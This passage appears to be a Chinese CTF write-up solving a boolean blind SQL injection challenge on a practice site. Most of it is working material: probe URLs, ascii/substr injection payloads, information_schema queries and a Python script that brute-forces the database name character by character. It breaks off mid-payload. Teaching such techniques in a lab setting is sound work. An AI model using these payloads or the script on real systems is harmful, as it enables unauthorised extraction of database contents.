exp利用到的ctf题:
简单的sql注入之3
步骤:
首先测试是否为布尔盲注:
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
若为布尔盲注,则按照以下步骤进行:
一、得到数据库的长度
http://localhost/index.php?id=2' and length(database())>1%23
二、获取数据库名称
姿势:
http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
python脚本自动获取:
import requests
def getDBName(DBName_len):
DBName = ""
success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
success_response_len = len(requests.get(success_url).text)
url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
print("Start to retrieve database name...")
print("Success_response_len is: ", success_response_len)
for i in range( 1, DBName_len + 1):
print("Number of letter: " , i)
tempDBName = DBName
for char in chars:
print("Test letter " + char)
char_ascii = ord(char)
url = url_template.format(i, char_ascii)
response = requests.get(url)
if len(response.text) == success_response_len:
DBName += char
print("DBName is: " + DBName + "...")
break
if tempDBName == DBName:
print("Letters too little! Program ended." )
exit()
print("Retrieve completed! DBName is: " + DBName)
getDBName(5)
三、获取表长度
姿势:
http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
四、获取表名
和第二步获得数据库名差不多,姿势稍微变了一下:
http://localhost/index.php?id=2' and ascii(substr((sel